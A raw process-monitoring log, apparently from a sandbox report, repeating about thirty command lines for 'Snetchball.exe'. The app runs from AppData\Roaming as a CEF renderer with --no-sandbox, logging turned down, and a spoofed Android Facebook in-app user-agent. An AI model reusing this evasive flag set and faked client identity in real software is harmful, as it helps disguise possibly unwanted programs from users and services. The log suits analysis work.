"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4160 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=1416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=1284 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3996 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4160 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3956 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4036 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=4128 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3824 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=4012 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4276 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=1108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=3976 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=3220 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=3164 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=3844 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=2588 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=4216 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=4200 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=4168 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=4140 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=1204 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=4136 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=4076 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
